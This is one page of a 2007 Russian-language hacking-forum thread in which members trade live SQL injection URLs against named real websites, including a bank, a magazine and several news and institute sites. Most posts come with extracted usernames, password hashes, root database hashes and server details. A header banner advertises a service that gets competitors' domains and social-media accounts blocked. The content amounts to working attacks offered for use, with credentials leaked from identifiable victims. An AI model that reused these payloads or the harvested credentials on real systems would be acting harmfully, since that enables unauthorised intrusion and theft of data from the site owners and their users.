УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 315 из 1242

315

Опции темы

Поиск в этой теме

Опции просмотра

#3141

22.09.2007, 17:09

c001er*

Познающий

Регистрация: 15.06.2007

Сообщений: 39

Провел на форуме:
262630

Репутация: 20

http://www.sgbank.ru/news.asp?news_id=1+or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT +IN+('bankdel','bankseek','cbr','currency_exch','c urrency_opt','currency_zayavka','doc_req','documen ts','dtproperties','forums','keybaseb','keybasef', 'messages','news1'))--
baser192:12345

#3142

22.09.2007, 17:56

BlackCats

Постоянный

Регистрация: 01.02.2006

Сообщений: 970

Провел на форуме:
9254548

Репутация: 1942

Google Page Rank 8/10
WebAlta WTR 9/10

4-ая версия..

логин+пароль:

Код:

http://www.mnogosearch.org/bugs/bugs.php?id=-1+union+select+1,2,pass,4,5,6,7,8,9,user,11,12,13,14,15,16+from+user/*

логин:
bar
хэш пасса:
948f878a52bb69d5e54fe8d04dcddfd5

Последний раз редактировалось BlackCats; 22.09.2007 в 18:08..

#3143

22.09.2007, 17:59

z01b

Постоянный

Регистрация: 05.01.2007

Сообщений: 508

Провел на форуме:
2360904

Репутация: 1393

Код:

http://www.concertseries.org/index.php?page=-1+union+select+0,1,2,3,4,version(),user(),7,8,9,10,11,12,13,15,17,18,19,20/*

#3144

22.09.2007, 18:09

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

Провел на форуме:
1292655

Репутация: 168

Отправить сообщение для big_BRAT с помощью ICQ

Цитата:

Сообщение от _-Ramos-_

www.chip.ua - сайт журнала CHIP

Код:

http://www.chip.ua/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

Скуль так розкрутить не удалось =\

P.S: _http://www.ichip.ru/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
тот же результат =)

___http://www.chip.ua/?page=poll&id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13+from+information_schema.tables+limit+16,1/*

#3145

22.09.2007, 18:23

BlackCats

Постоянный

Регистрация: 01.02.2006

Сообщений: 970

Провел на форуме:
9254548

Репутация: 1942

Цитата:

Сообщение от _-Ramos-_

www.chip.ua - сайт журнала CHIP

Код:

http://www.chip.ua/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

Скуль так розкрутить не удалось =\

P.S: _http://www.ichip.ru/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
тот же результат =)

все таблички:

Код:

http://www.chip.ua/?page=poll&id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.TABLES/*

все колонки:

Код:

http://www.chip.ua/?page=poll&id=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12,13+from+INFOrMATION_SCHEMA.COLUMNS/*

#3146

22.09.2007, 18:30

BlackCats

Постоянный

Регистрация: 01.02.2006

Сообщений: 970

Провел на форуме:
9254548

Репутация: 1942

Цитата:

Сообщение от z01b

Код:

http://www.northberwickuk.com/info.php?id=-1+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,25,26,27/*&catid=324&f=NorthBerwick&type=featured

пасс: test.. логина не нашёл.. предполагаю что тоже test

Код:

http://www.northberwickuk.com/info.php?id=-1+union+select+0,password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,25,26,27+from+user/*&catid=324&f=NorthBerwick&type=featured

#3147

22.09.2007, 19:00

z01b

Постоянный

Регистрация: 05.01.2007

Сообщений: 508

Провел на форуме:
2360904

Репутация: 1393

Код:

http://www.sbinstitute.com/news.php?id=-1+union+select+0,concat(user,char(58),password),user,3,4+from+mysql.user/*

root:18846f503afd5707

Второй рут за сегодня )
К сожаленью пасс расшифровать не удалось (

#3148

22.09.2007, 21:11

valiko

Участник форума

Регистрация: 28.01.2007

Сообщений: 153

Провел на форуме:
1237085

Репутация: 452

Код:

http://www.reporterdiario.com.br/index.php=3fid=3d-33150'+union+select+1,user(),database(),version(),5,6,7,8,9,10,11/*

#3149

22.09.2007, 21:33

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

https://forum.antichat.ru/showpost.php?p=340659&postcount=1987

Цитата:

Сообщение от BlackCats

Цитата:

http://www.mnogosearch.org/bugs/bugs.php?id=21+order+by+16

9898

https://forum.antichat.ru/showpost.php?p=465643&postcount=3174

Цитата:

Сообщение от BlackCats

Google Page Rank 8/10
WebAlta WTR 9/10

4-ая версия..

логин+пароль:

Код:

http://www.mnogosearch.org/bugs/bugs.php?id=-1+union+select+1,2,pass,4,5,6,7,8,9,user,11,12,13,14,15,16+from+user/*

логин:
bar
хэш пасса:
948f878a52bb69d5e54fe8d04dcddfd5

Классно, можно выкладывать раз по 10, так наверное эффективнее (репы больше и т.д.) получится?

#3150

23.09.2007, 00:36

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

Провел на форуме:
1292655

Репутация: 168

___http://kino.ukr.net/i/nw.php?t=nologo&f=&id=4897999+uNioN+seLect+concat( login,0x3a,passw),null,null,null,null+from+users+l imit+6,1/*&mid=1345
результат в исходниках страницы
version() 5.0.18
user() afisha@10.60.20.5
database() afisha

Страница 315 из 1242

315

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход